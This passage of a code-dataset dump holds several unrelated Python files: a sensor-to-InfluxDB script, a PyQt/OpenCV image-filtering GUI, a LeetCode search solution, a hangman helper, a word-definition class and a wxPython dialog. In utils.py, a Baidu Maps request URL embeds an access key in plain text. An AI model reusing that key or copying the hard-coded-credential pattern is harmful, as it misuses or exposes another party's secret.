'gatttool':\n backend = GatttoolBackend\n elif config_backend == 'bluepy':\n backend = BluepyBackend\n elif config_backend == 'pygatt':\n backend = PygattBackend\n else:\n raise Exception('unknown backend: {}'.format(config_backend))\n return backend\n\n\ndef main():\n \"\"\"Main function.\n\n Check config and start pushing data to Influx\n \"\"\"\n global backend\n global json_body\n global clear_hosts\n backend = _get_backend(miflora_backend)\n for hostname in to_scan:\n try:\n mac = valid_miflora_mac(devices[hostname])\n print(\"connecting: %s @ %s\" %(hostname,mac))\n poll(mac, hostname)\n history(mac, hostname)\n except TypeError:\n print(\"MAC address not correct, please check it!\")\n except base.BluetoothBackendException:\n print(\"We have a Bluetooth issue, please check your device!\")\n except BrokenPipeError:\n print(\"History Data is corrupted!\")\n except Exception as ex:\n print(str(ex))\n\n try:\n database_error = True\n db_client.write_points(json_body, time_precision='s')\n database_error = False\n\n # Only if the transfer of history to the DB succeeded do we delete the history on the sensors!\n print(clear_hosts)\n for hostname in clear_hosts:\n mac = valid_miflora_mac(devices[hostname])\n clear_history(mac)\n except requests.exceptions.ConnectionError as 
connection:\n print(\"Connection to InfluxDB failed!\")\n except Exception as e:\n print(\"Houston, we have a serious problem!\")\n\n # Cache data, if there was a problem with the Database connection\n if database_error:\n try:\n with open(json_filename,'w') as json_file:\n json.dump(json_body,json_file)\n except Exception as e:\n print(\"Sorry, writing to cache file was not possible!\")\n else:\n try: os.remove(json_filename)\n except: pass\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"influx.py","file_name":"influx.py","file_ext":"py","file_size_in_byte":5187,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"622202388","text":"#!/usr/bin/python3\r\n# -*- coding: utf-8 -*-\r\n\r\nfrom sys import argv, exit\r\nfrom os import walk\r\n\r\nfrom PyQt5.QtGui import *\r\nfrom PyQt5.QtCore import *\r\nfrom PyQt5.QtWidgets import *\r\nfrom PyQt5 import QtCore, QtGui, QtWidgets\r\n\r\n\r\nfrom mainWindowLayout import MainLayout\r\n\r\nimport cv2\r\nimport numpy as np\r\nfrom math import sqrt, pow, exp\r\n\r\nclass MainWindow(QMainWindow, MainLayout):\r\n imagePaths = []\r\n originImages = [] \r\n imageList = [] # 二维的图像列表,用于存储原图像以及处理后的图像\r\n hideLayoutTag = -1\r\n\r\n def __init__(self,parent = None):\r\n super(MainWindow, self).__init__(parent)\r\n self.setupUi(self)\r\n self.signalSlots()\r\n setHideButton(self)\r\n\r\n # 绑定按钮与具体方法\r\n def signalSlots(self):\r\n # 文件按钮相关方法\r\n # 打开\r\n self.openAct.triggered.connect(lambda : importImage(self))\r\n # 退出\r\n self.exitAct.triggered.connect(self.close)\r\n\r\n # 灰度变换按钮相关方法\r\n # 指数灰度变换\r\n self.expAct.triggered.connect(lambda : ExpGray(self))\r\n # 负片\r\n self.reverseAct.triggered.connect(lambda : ReverseGray(self))\r\n\r\n # 伽马矫正方法\r\n self.GammaButton.clicked.connect(lambda : GammaChange(self))\r\n\r\n # 滤波按钮相关方法\r\n # 均值滤波\r\n self.avgFilter.triggered.connect(lambda : AvgFilter(self))\r\n # 中值滤波\r\n self.medFilter.triggered.connect(lambda : MedFilter(self))\r\n\r\n # 拉普拉斯锐化方法\r\n self.LaplaceButton.clicked.connect(lambda : Laplacian(self))\r\n\r\n # 傅里叶变换方法\r\n self.FourierButton.clicked.connect(lambda : FourierChange(self))\r\n\r\n # 直方图均衡化方法\r\n self.HistogramButton.clicked.connect(lambda : HistogramEqualization(self))\r\n\r\n # 频率域滤波按钮相关方法\r\n # 布特沃思高通滤波\r\n self.ButterworthHighAct.triggered.connect(lambda : ButterworthHigh(self))\r\n # 布特沃思低通滤波\r\n self.ButterworthLowAct.triggered.connect(lambda : ButterworthLow(self))\r\n\r\n # 图像复原相关方法\r\n # 频率域逆滤波\r\n self.InverseFilteringAct.triggered.connect(lambda : InverseFiltering(self))\r\n # 维纳滤波\r\n self.WienerFilteringAct.triggered.connect(lambda : WienerFiltering(self))\r\n\r\n # 底部按钮\r\n # 上一张\r\n self.preButton.clicked.connect(lambda : preImage(self))\r\n # 下一张\r\n self.nextButton.clicked.connect(lambda : nextImage(self))\r\n # 退出\r\n self.exitButton.clicked.connect(self.close)\r\n\r\n\r\n# 灰度变换按钮相关方法\r\n# 指数灰度变换\r\ndef ExpGray(window):\r\n imageList = []\r\n for img in window.originImages:\r\n imgs = []\r\n img_info = img[0].shape\r\n img_height = img_info[0]\r\n img_width = img_info[1]\r\n result = []\r\n result = np.arange(img_height*img_width*3, dtype='uint8').reshape(img_height, img_width, 3)\r\n for i in range(img_height):\r\n for j in range(img_width):\r\n for k in range(3):\r\n # 对原图像的像素进行指数处理\r\n result[i][j][k] = 7.0 * pow(img[0][i][j][k], 0.6)\r\n imgs.extend([img[0],result])\r\n imageList.append(imgs)\r\n resizeFromList(window, imageList)\r\n showImage(window,['原图','指数灰度变换'])\r\n\r\n# 负片\r\ndef ReverseGray(window):\r\n 
imageList = []\r\n for img in window.originImages:\r\n imgs = []\r\n # 对原图像进行负片处理\r\n result = 255-img[0]\r\n imgs.extend([img[0],result])\r\n imageList.append(imgs)\r\n resizeFromList(window, imageList)\r\n showImage(window,['原图','负片'])\r\n\r\n\r\n# 伽马矫正按钮方法\r\ndef GammaChange(window):\r\n imageList = []\r\n for img in window.originImages:\r\n imgs = []\r\n img_info = img[0].shape\r\n img_height = img_info[0]\r\n img_width = img_info[1]\r\n result = []\r\n result = np.arange(img_height*img_width*3, dtype='uint8').reshape(img_height, img_width, 3)\r\n for i in range(img_height):\r\n for j in range(img_width):\r\n for k in range(3):\r\n # 对原图像的像素进行伽马矫正\r\n result[i][j][k] = 1.0 * np.power(img[0][i][j][k]/255.0, 1/0.6) * 255.0\r\n imgs.extend([img[0],result])\r\n imageList.append(imgs)\r\n resizeFromList(window, imageList)\r\n showImage(window,['原图','伽马矫正'])\r\n\r\n#滤波按钮相关方法\r\n#均值滤波\r\ndef AvgFilter(window):\r\n imageList = []\r\n for img in window.originImages:\r\n imgs = []\r\n # 对原图像进行均值滤波\r\n result = cv2.blur(img[0], (5, 5))\r\n imgs.extend([img[0],result])\r\n imageList.append(imgs)\r\n resizeFromList(window, imageList)\r\n showImage(window,['原图','均值滤波'])\r\n\r\n#中值滤波\r\ndef MedFilter(window):\r\n imageList = []\r\n for img in window.originImages:\r\n imgs = []\r\n # 对原图像进行中值滤波\r\n result = cv2.medianBlur(img[0],5)\r\n imgs.extend([img[0],result])\r\n imageList.append(imgs)\r\n resizeFromList(window, imageList)\r\n showImage(window,['原图','中值滤波'])\r\n\r\n\r\n#拉普拉斯锐化按钮方法\r\ndef Laplacian(window):\r\n imageList = []\r\n for img in window.originImages:\r\n imgs = []\r\n img_height, img_width = img[0].shape[:2]\r\n # 获得原图像的拉普拉斯算子\r\n laplace = cv2.Laplacian(img[0], cv2.CV_64F, ksize=3)\r\n laplace[laplace<0] = 0\r\n laplace[laplace>255] = 255\r\n # 原图像减去拉普拉斯算子,得到锐化后的图像\r\n result = img[0] - laplace\r\n result[result<0] = 0\r\n result[result>255] = 255\r\n result = cv2.resize(src=result, dsize=(img_height, img_width)).astype('uint8')\r\n imgs.extend([img[0],result])\r\n imageList.append(imgs)\r\n resizeFromList(window, imageList)\r\n showImage(window,['原图','拉普拉斯锐化'])\r\n\r\n\r\n# 傅里叶变换按钮方法\r\ndef FourierChange(window):\r\n imageList = []\r\n for img in window.originImages:\r\n imgs = []\r\n # 提取图像的三个通道\r\n b,g,r = cv2.split(img[0])\r\n # 对每个通道单独进行傅里叶变换\r\n b_freImg,b_recImg = oneChannelDft(b)\r\n g_freImg, g_recImg = oneChannelDft(g)\r\n r_freImg, r_recImg = oneChannelDft(r)\r\n # 将处理后的通道合并成一个图像\r\n freImg = cv2.merge([b_freImg,g_freImg,r_freImg])\r\n imgs.extend([img[0],freImg])\r\n imageList.append(imgs)\r\n resizeFromList(window, imageList)\r\n showImage(window,['原图','傅里叶变换'])\r\ndef oneChannelDft(img):\r\n width, height = img.shape\r\n nwidth = cv2.getOptimalDFTSize(width)\r\n nheigth = cv2.getOptimalDFTSize(height)\r\n nimg = np.zeros((nwidth, nheigth))\r\n nimg[:width, :height] = img\r\n dft = cv2.dft(np.float32(nimg), flags = cv2.DFT_COMPLEX_OUTPUT)\r\n ndft = dft[:width, :height]\r\n ndshift = np.fft.fftshift(ndft)\r\n magnitude = np.log(cv2.magnitude(ndshift[:, :, 0], ndshift[:, :, 1]))\r\n result = (magnitude - magnitude.min()) / (magnitude.max() - magnitude.min()) * 255\r\n frequencyImg = result.astype('uint8')\r\n ilmg = cv2.idft(dft)\r\n ilmg = cv2.magnitude(ilmg[:, :, 0], ilmg[:, :, 1])[:width, :height]\r\n ilmg = np.floor((ilmg - ilmg.min()) / (ilmg.max() - ilmg.min()) * 255)\r\n recoveredImg = ilmg.astype('uint8')\r\n return frequencyImg,recoveredImg\r\n\r\n# 直方图均衡化按钮方法\r\ndef HistogramEqualization(window):\r\n imageList = []\r\n for img in window.originImages:\r\n imgs = 
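# The per-pixel triple loops in ExpGray and GammaChange above are O(H*W*3) in pure
# Python. For 8-bit images the same point transform can be precomputed once as a
# 256-entry lookup table and applied with cv2.LUT. A sketch, assuming uint8 input;
# the 1/0.6 exponent mirrors the GammaChange code above:
import cv2
import numpy as np

def gamma_lut(img, gamma=1 / 0.6):
    # Build the mapping for all 256 possible intensities, then apply it to
    # every pixel (and every channel) in one vectorized call.
    table = np.clip(((np.arange(256) / 255.0) ** gamma) * 255.0, 0, 255).astype('uint8')
    return cv2.LUT(img, table)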
[]\r\n b, g, r = cv2.split(img[0])\r\n b_equal = cv2.equalizeHist(b)\r\n g_equal = cv2.equalizeHist(g)\r\n r_equal = cv2.equalizeHist(r)\r\n result = cv2.merge([b_equal, g_equal, r_equal])\r\n imgs.extend([img[0],result])\r\n imageList.append(imgs)\r\n resizeFromList(window, imageList)\r\n showImage(window,['原图','直方图均衡化'])\r\n\r\n# 频率域滤波按钮相关方法\r\n# 布特沃斯高通滤波\r\ndef ButterworthHigh(window):\r\n imageList = []\r\n for img in window.originImages:\r\n imgs = []\r\n # 提取图像的三个通道\r\n B, G, R = cv2.split(img[0])\r\n # 对每个通道单独进行布特沃斯高通滤波,D0取20\r\n B = OneChannelButterworth(B, 1, 20)\r\n G = OneChannelButterworth(G, 1, 20)\r\n R = OneChannelButterworth(R, 1, 20)\r\n # 将处理后的通道合并成一个图像\r\n result = cv2.merge([B, G, R])\r\n imgs.extend([img[0],result])\r\n imageList.append(imgs)\r\n resizeFromList(window, imageList)\r\n showImage(window,['原图','布特沃斯高通滤波'])\r\n\r\n# 布特沃斯低通滤波\r\ndef ButterworthLow(window):\r\n imageList = []\r\n for img in window.originImages:\r\n imgs = []\r\n # 提取图像的三个通道\r\n B, G, R = cv2.split(img[0])\r\n # 对每个通道单独进行布特沃斯低通滤波,D0取80\r\n B = OneChannelButterworth(B, 0, 80)\r\n G = OneChannelButterworth(G, 0, 80)\r\n R = OneChannelButterworth(R, 0, 80)\r\n # 将处理后的通道合并成一个图像\r\n result = cv2.merge([B, G, R])\r\n imgs.extend([img[0],result])\r\n imageList.append(imgs)\r\n resizeFromList(window, imageList)\r\n showImage(window,['原图','布特沃斯低通滤波'])\r\n\r\ndef OneChannelButterworth(image, method, D0):\r\n n = 2\r\n img_height, img_width = image.shape[:2]\r\n dft_img = np.fft.fft2(image)\r\n dft_img = np.fft.fftshift(dft_img)\r\n H = np.zeros_like(dft_img)\r\n for i in range(img_height):\r\n for j in range(img_width):\r\n D = sqrt((pow(i-img_height/2, 2)+pow(j-img_width/2, 2)))\r\n H[i][j] = 1./(1+pow(D/D0, 2*n))\r\n if method:\r\n result = dft_img*(1-H)\r\n else:\r\n result = dft_img*H\r\n idft_img = np.fft.ifftshift(result)\r\n idft_img = np.fft.ifft2(idft_img)\r\n result = np.abs(np.real(idft_img))\r\n result = np.clip(result,0,255)\r\n return result.astype('uint8')\r\n\r\n\r\n# 图像复原按钮相关方法\r\n# 频率逆滤波\r\ndef InverseFiltering(window):\r\n imageList = []\r\n for img in window.originImages:\r\n imgs = []\r\n # 提取图像的三个通道\r\n B, G, R = cv2.split(img[0])\r\n # 对每个通道单独进行频率逆滤波\r\n B = OneChannelIF(B)\r\n G = OneChannelIF(G)\r\n R = OneChannelIF(R)\r\n # 将处理后的通道合并成一个图像\r\n result = cv2.merge([B, G, R])\r\n imgs.extend([img[0],result])\r\n imageList.append(imgs)\r\n resizeFromList(window, imageList)\r\n showImage(window,['原图','频率域逆滤波图像复原'])\r\ndef OneChannelIF(image):\r\n img_height, img_width = image.shape[:2]\r\n result = np.zeros_like(image, dtype=complex)\r\n # 先对原图像进行傅里叶变换并移至中心\r\n dft_img = np.fft.fft2(image)\r\n dft_img = np.fft.fftshift(dft_img)\r\n for i in range(img_height):\r\n for j in range(img_width):\r\n result[i][j] = dft_img[i][j] / H(i,j)\r\n # 对图像进行逆傅里叶变换\r\n idft_img = np.fft.ifftshift(result)\r\n idft_img = np.fft.ifft2(idft_img)\r\n result = np.abs(np.real(idft_img))\r\n result = np.clip(result,0,255)\r\n return result.astype('uint8')\r\n\r\n#维纳滤波\r\ndef WienerFiltering(window):\r\n imageList = []\r\n for img in window.originImages:\r\n imgs = []\r\n # 提取图像的三个通道\r\n B, G, R = cv2.split(img[0])\r\n # 对每个通道单独进行维纳滤波\r\n B = OneChannelWF(B)\r\n G = OneChannelWF(G)\r\n R = OneChannelWF(R)\r\n # 将处理后的通道合并成一个图像\r\n result = cv2.merge([B, G, R])\r\n imgs.extend([img[0],result])\r\n imageList.append(imgs)\r\n resizeFromList(window, imageList)\r\n showImage(window,['原图','维纳滤波图像复原'])\r\ndef OneChannelWF(image):\r\n K = 0.0001\r\n img_height, img_width = image.shape[:2]\r\n result = 
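# OneChannelButterworth above fills the transfer function H with two nested Python
# loops. The same H can be built in one shot with a meshgrid. A sketch under the same
# centered-spectrum convention (distance D measured from the image center):
import numpy as np

def butterworth_lowpass(shape, D0, n=2):
    h, w = shape
    # U varies along the width, V along the height; both end up shaped (h, w).
    U, V = np.meshgrid(np.arange(w) - w / 2, np.arange(h) - h / 2)
    D = np.sqrt(U ** 2 + V ** 2)
    return 1.0 / (1.0 + (D / D0) ** (2 * n))  # multiply by the shifted spectrum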
np.zeros_like(image, dtype=complex)\r\n # 先对原图像进行傅里叶变换并移至中心\r\n dft_img = np.fft.fft2(image)\r\n dft_img = np.fft.fftshift(dft_img)\r\n for i in range(img_height):\r\n for j in range(img_width):\r\n result[i][j] = (H(i,j)/(pow(H(i,j),2)+K))*dft_img[i][j]\r\n # 对图像进行逆傅里叶变换\r\n idft_img = np.fft.ifftshift(result)\r\n idft_img = np.fft.ifft2(idft_img)\r\n result = np.abs(np.real(idft_img))\r\n result = np.clip(result,0,255)\r\n return result.astype('uint8')\r\n\r\ndef H(u, v):\r\n k = 0.00001\r\n return exp(-1*k*pow(pow(u,2)+pow(v,2), 5/6))\r\n\r\n#打开图像\r\ndef importImage(window):\r\n fname, _ = QFileDialog.getOpenFileName(window, 'Open file', '.', 'Image Files(*.jpg *.bmp *.png *.jpeg *.rgb *.tif)')\r\n if fname != '':\r\n window.importImageEdit.setText(fname)\r\n window.imagePaths = []\r\n window.originImages = []\r\n window.imageList = []\r\n window.imagePaths.append(fname)\r\n if window.imagePaths != []:\r\n readIamge(window)\r\n resizeFromList(window, window.originImages)\r\n showImage(window)\r\n showButton(window)\r\n\r\ndef readIamge(window):\r\n window.originImages = []\r\n for path in window.imagePaths:\r\n imgs = []\r\n img = cv2.imdecode(np.fromfile(path, dtype = np.uint8), 1)\r\n imgs.append(img)\r\n window.originImages.append(imgs)\r\n\r\n#显示图像\r\ndef showImage(window,headers = []):\r\n window.showImageView.clear()\r\n window.showImageView.setColumnCount(len(window.imageList[0]))\r\n window.showImageView.setRowCount(len(window.imageList))\r\n\r\n window.showImageView.setShowGrid(False)\r\n window.showImageView.setEditTriggers(QAbstractItemView.NoEditTriggers)\r\n window.showImageView.setHorizontalHeaderLabels(headers)\r\n for x in range(len(window.imageList[0])):\r\n for y in range(len(window.imageList)):\r\n imageView = QGraphicsView()\r\n imageView.setHorizontalScrollBarPolicy(Qt.ScrollBarAlwaysOff)\r\n imageView.setVerticalScrollBarPolicy(Qt.ScrollBarAlwaysOff)\r\n\r\n img = window.imageList[y][x]\r\n width = img.shape[1]\r\n height = img.shape[0]\r\n img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\r\n\r\n window.showImageView.setColumnWidth(x, width)\r\n window.showImageView.setRowHeight(y, height)\r\n\r\n frame = QImage(img, width, height, QImage.Format_RGB888)\r\n # 调用QPixmap命令,建立一个图像存放框\r\n pix = QPixmap.fromImage(frame)\r\n item = QGraphicsPixmapItem(pix) \r\n scene = QGraphicsScene() # 创建场景\r\n scene.addItem(item)\r\n imageView.setScene(scene)\r\n window.showImageView.setCellWidget(y, x, imageView)\r\n\r\ndef resizeFromList(window,imageList):\r\n width = 600\r\n height = 600\r\n window.imageList = []\r\n for x_pos in range(len(imageList)):\r\n imgs = []\r\n for img in imageList[x_pos]:\r\n image = cv2.resize(img, (width, height), interpolation = cv2.INTER_CUBIC)\r\n imgs.append(image)\r\n window.imageList.append(imgs)\r\n\r\n# 设置按钮不可见\r\ndef setHideButton(window):\r\n window.GrayButton.hide()\r\n window.GammaButton.hide()\r\n window.FilterButton.hide()\r\n window.LaplaceButton.hide()\r\n window.FourierButton.hide()\r\n window.HistogramButton.hide()\r\n window.FrequencyButton.hide()\r\n window.RestoreButton.hide()\r\n window.preButton.setEnabled(False)\r\n window.nextButton.setEnabled(False)\r\n\r\n# 设置按钮可见\r\ndef showButton(window):\r\n window.GrayButton.setVisible(True)\r\n window.GammaButton.setVisible(True)\r\n window.FilterButton.setVisible(True)\r\n window.LaplaceButton.setVisible(True)\r\n window.FourierButton.setVisible(True)\r\n window.HistogramButton.setVisible(True)\r\n window.FrequencyButton.setVisible(True)\r\n window.RestoreButton.setVisible(True)\r\n 
window.preButton.setEnabled(True)\r\n window.nextButton.setEnabled(True)\r\n\r\n# 获取所得文件的目录\r\ndef getDirFromFname(fname):\r\n pathList=fname.split('/')\r\n filename=pathList.pop()\r\n dirname='/'.join(pathList)\r\n return dirname,filename\r\n\r\n# 上一页按钮事件\r\ndef preImage(window):\r\n fname=window.imagePaths[0]\r\n dirname,filename=getDirFromFname(fname)\r\n imageList=[]\r\n picTypes=['.jpg','.bmp','.png','.jpeg','.rgb','.tif']\r\n root, dirs, files = walk(dirname).__next__()\r\n for file in files:\r\n if(file[-4:] in picTypes or file[-5:] in picTypes):\r\n imageList.append(file)\r\n index=imageList.index(filename)\r\n if index==0:\r\n window.preButton.setEnabled(False)\r\n QMessageBox.information(window, \"错误提示\", \"这已经是第一张图片\", QMessageBox.Ok)\r\n else: \r\n window.nextButton.setEnabled(True)\r\n index=index-1\r\n fname=root+'/'+imageList[index]\r\n window.importImageEdit.setText(fname)\r\n window.imagePaths = []\r\n window.originImages = []\r\n window.imageList = []\r\n window.imagePaths.append(fname)\r\n if window.imagePaths != []:\r\n readIamge(window)\r\n resizeFromList(window, window.originImages)\r\n showImage(window)\r\n\r\n# 下一页按钮事件\r\ndef nextImage(window):\r\n fname=window.imagePaths[0]\r\n dirname,filename=getDirFromFname(fname)\r\n imageList=[]\r\n picTypes=['.jpg','.bmp','.png','.jpeg','.rgb','.tif']\r\n root, dirs, files = walk(dirname).__next__()\r\n for file in files:\r\n if(file[-4:] in picTypes or file[-5:] in picTypes):\r\n imageList.append(file)\r\n index=imageList.index(filename)\r\n if index==len(imageList)-1:\r\n window.nextButton.setEnabled(False)\r\n QMessageBox.information(window, \"错误提示\", \"这已经是最后一张图片\", QMessageBox.Ok)\r\n else: \r\n window.preButton.setEnabled(True)\r\n index=index+1\r\n fname=root+'/'+imageList[index]\r\n window.importImageEdit.setText(fname)\r\n window.imagePaths = []\r\n window.originImages = []\r\n window.imageList = []\r\n window.imagePaths.append(fname)\r\n if window.imagePaths != []:\r\n readIamge(window)\r\n resizeFromList(window, window.originImages)\r\n showImage(window)\r\n\r\nif __name__ == '__main__':\r\n\r\n app = QApplication(argv)\r\n mw = MainWindow()\r\n mw.show()\r\n exit(app.exec_())\r\n","sub_path":"mainWindow.py","file_name":"mainWindow.py","file_ext":"py","file_size_in_byte":18531,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"595480062","text":"class Solution:\n def search(self, nums: List[int], target: int, l = None, r = None) -> int:\n l = l if l is not None else 0\n r = r if r is not None else len(nums) - 1\n \n while r >= l:\n mid = (r + l) // 2\n \n if nums[mid] == target:\n return mid\n elif (nums[r] >= nums[mid] and nums[l] >= nums[mid]) or (nums[r] <= nums[mid] and nums[l] <= nums[mid]):\n # It can be on either side:\n ls = self.search(nums, target, l, mid - 1) \n rs = self.search(nums, target, mid+1, r)\n if max(ls, rs) >=0:\n return max(ls, rs)\n else:\n break\n elif nums[mid] > target:\n r = mid - 1\n else:\n l = mid + 1\n \n return -1\n","sub_path":"problems/Search in Rotated Sorted Array/Solution.py","file_name":"Solution.py","file_ext":"py","file_size_in_byte":860,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"478192244","text":"# _*_ coding: UTF-8 _*_\n'''\nCreated on 2015年2月28日\n\n@author: dev\n'''\nimport datetime\nimport json\nimport logging\n\nimport httplib2\n\n\nlogger = logging.getLogger(__name__)\n\n\ndef getDay(_days):\n return datetime.date.today() + 
datetime.timedelta(days=_days)\n\n\ndef getWeek(_day):\n week = {0:'周一', 1:'周二', 2:'周三', 3:'周四', 4:'周五', 5:'周六', 6:'周日'}\n return week.get(_day.weekday()) \n\n\ndef getLbsData(longitude, latitude, ltype, shopid):\n url = 'http://api.map.baidu.com/geosearch/v3/nearby?ak=WqtBXK9Vm1p0sGvr48h8rpO0&geotable_id=85323&page_size=50&location=%s,%s&radius=15000&sortby=distance:1&filter=%s'\n h = httplib2.Http()\n if shopid :\n myfilter = 'ltype:[' + ltype + ']|shopid:[' + shopid + ']'\n else :\n myfilter = 'ltype:[' + ltype + ']'\n logger.debug('lbs-url:[%s]' %(url % (longitude,latitude, myfilter)))\n resp, content = h.request(url % (longitude,latitude, myfilter))\n if resp.status == 200 :\n decoded = json.loads(content)\n lbsIds = []\n returnDict = {}\n for local in decoded['contents'] :\n lbsIds.append(local['uid'])\n returnDict[local['uid']]= {'distance':local['distance'],}\n return lbsIds, returnDict\n\n\ndef getUrlData(url):\n h = httplib2.Http()\n resp, content =h.request(url)\n if resp.status == 200 :\n return content\n\ndef sendMessage(phone, code):\n pass\n","sub_path":"mj_py/mj/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1417,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"92532482","text":"\n\n#calss header\nclass _COMPENSATION():\n\tdef __init__(self,): \n\t\tself.name = \"COMPENSATION\"\n\t\tself.definitions = [u'money that is paid to someone in exchange for something that has been lost or damaged or for some problem: ', u'something that makes you feel better when you have suffered something bad: ', u'the combination of money and other benefits (= rewards) that an employee receives for doing their job: ']\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'nouns'\n\n\n\tdef run(self, obj1 = [], obj2 = []):\n\t\treturn self.jsondata\n","sub_path":"xai/brain/wordbase/nouns/_compensation.py","file_name":"_compensation.py","file_ext":"py","file_size_in_byte":587,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"415048322","text":"'''\nImplement the function isWordGuessed that takes in two parameters - a string, secretWord, and a list of letters, lettersGuessed. This function returns a boolean - True if secretWord has been guessed (ie, all the letters of secretWord are in lettersGuessed) and False otherwise.\n\nExample Usage:\n\n>>> secretWord = 'apple' \n>>> lettersGuessed = ['e', 'i', 'k', 'p', 'r', 's']\n>>> print(isWordGuessed(secretWord, lettersGuessed))\nFalse\nFor this function, you may assume that all the letters in secretWord and lettersGuessed are lowercase.\n'''\n\ndef isWordGuessed(secretWord, lettersGuessed):\n '''\n secretWord: string, the word the user is guessing\n lettersGuessed: list, what letters have been guessed so far\n returns: boolean, True if all the letters of secretWord are in lettersGuessed;\n False otherwise\n '''\n guess = False\n for c in secretWord:\n if c in lettersGuessed:\n guess = True\n continue\n elif c not in lettersGuessed:\n guess = False \n break \n return guess\n","sub_path":"Problem Sets/Week3/problem1.py","file_name":"problem1.py","file_ext":"py","file_size_in_byte":1054,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"194611961","text":"# Licensed to the Apache Software Foundation (ASF) under one\n# or more contributor license agreements. 
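# isWordGuessed above walks the secret word with manual flag bookkeeping; the same
# check collapses to a single all() expression. A sketch, reusing the docstring's
# example as a quick self-test:
def is_word_guessed(secret_word, letters_guessed):
    # True exactly when every character of the word appears among the guesses.
    return all(c in letters_guessed for c in secret_word)

assert is_word_guessed('apple', ['e', 'i', 'k', 'p', 'r', 's']) is False
assert is_word_guessed('apple', ['a', 'p', 'l', 'e']) is True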
See the NOTICE file\n# distributed with this work for additional information\n# regarding copyright ownership. The ASF licenses this file\n# to you under the Apache License, Version 2.0 (the\n# \"License\"); you may not use this file except in compliance\n# with the License. You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing,\n# software distributed under the License is distributed on an\n# \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n# KIND, either express or implied. See the License for the\n# specific language governing permissions and limitations\n# under the License.\n\n\nimport wx\nimport armid\nimport WidgetFactory\n\nclass ContributorEntryDialog(wx.Dialog):\n def __init__(self,parent,firstName = '',surname='',affiliation='',role=''):\n wx.Dialog.__init__(self,parent,armid.CONTRIBUTORENTRY_ID,'Add Contributor',style=wx.DEFAULT_DIALOG_STYLE|wx.MAXIMIZE_BOX|wx.THICK_FRAME|wx.RESIZE_BORDER,size=(500,300))\n self.theFirstName = firstName\n self.theSurname = surname\n self.theAffiliation = affiliation\n self.theRole = role\n mainSizer = wx.BoxSizer(wx.VERTICAL)\n\n mainSizer.Add(WidgetFactory.buildTextSizer(self,'Firstname',(87,30),armid.CONTRIBUTORENTRY_TEXTFIRSTNAME_ID),0,wx.EXPAND)\n mainSizer.Add(WidgetFactory.buildTextSizer(self,'Surname',(87,30),armid.CONTRIBUTORENTRY_TEXTSURNAME_ID),0,wx.EXPAND)\n mainSizer.Add(WidgetFactory.buildTextSizer(self,'Affiliation',(87,30),armid.CONTRIBUTORENTRY_TEXTAFFILIATION_ID),0,wx.EXPAND)\n participantRoles = ['Participant','Facilitator','Scribe']\n mainSizer.Add(WidgetFactory.buildComboSizerList(self,'Role',(87,30),armid.CONTRIBUTORENTRY_COMBOROLE_ID,participantRoles),0,wx.EXPAND)\n mainSizer.Add(wx.StaticText(self,-1),1,wx.EXPAND)\n\n mainSizer.Add(WidgetFactory.buildAddCancelButtonSizer(self,armid.CONTRIBUTORENTRY_BUTTONCOMMIT_ID),0,wx.ALIGN_CENTER)\n self.SetSizer(mainSizer)\n\n wx.EVT_BUTTON(self,armid.CONTRIBUTORENTRY_BUTTONCOMMIT_ID,self.onCommit)\n self.commitLabel = 'Add'\n if (len(self.theFirstName) > 0):\n self.commitLabel = 'Edit'\n self.SetLabel('Edit Contributor')\n firstNameCtrl = self.FindWindowById(armid.CONTRIBUTORENTRY_TEXTFIRSTNAME_ID)\n firstNameCtrl.SetValue(self.theFirstName)\n surnameCtrl = self.FindWindowById(armid.CONTRIBUTORENTRY_TEXTSURNAME_ID)\n surnameCtrl.SetValue(self.theSurname)\n affiliationCtrl = self.FindWindowById(armid.CONTRIBUTORENTRY_TEXTAFFILIATION_ID)\n affiliationCtrl.SetValue(self.theAffiliation)\n roleCtrl = self.FindWindowById(armid.CONTRIBUTORENTRY_COMBOROLE_ID)\n roleCtrl.SetStringSelection(self.theRole)\n buttonCtrl = self.FindWindowById(armid.CONTRIBUTORENTRY_BUTTONCOMMIT_ID)\n buttonCtrl.SetLabel('Edit')\n \n\n def onCommit(self,evt):\n firstNameCtrl = self.FindWindowById(armid.CONTRIBUTORENTRY_TEXTFIRSTNAME_ID)\n surnameCtrl = self.FindWindowById(armid.CONTRIBUTORENTRY_TEXTSURNAME_ID)\n affiliationCtrl = self.FindWindowById(armid.CONTRIBUTORENTRY_TEXTAFFILIATION_ID)\n roleCtrl = self.FindWindowById(armid.CONTRIBUTORENTRY_COMBOROLE_ID)\n\n self.theFirstName = firstNameCtrl.GetValue()\n self.theSurname = surnameCtrl.GetValue()\n self.theAffiliation = affiliationCtrl.GetValue()\n self.theRole = roleCtrl.GetStringSelection()\n\n if (len(self.theFirstName) == 0):\n dlg = wx.MessageDialog(self,'No firstname',self.commitLabel + ' Contributor',wx.OK)\n dlg.ShowModal()\n dlg.Destroy()\n return\n elif (len(self.theSurname) == 0):\n dlg = wx.MessageDialog(self,'No surname',self.commitLabel + ' 
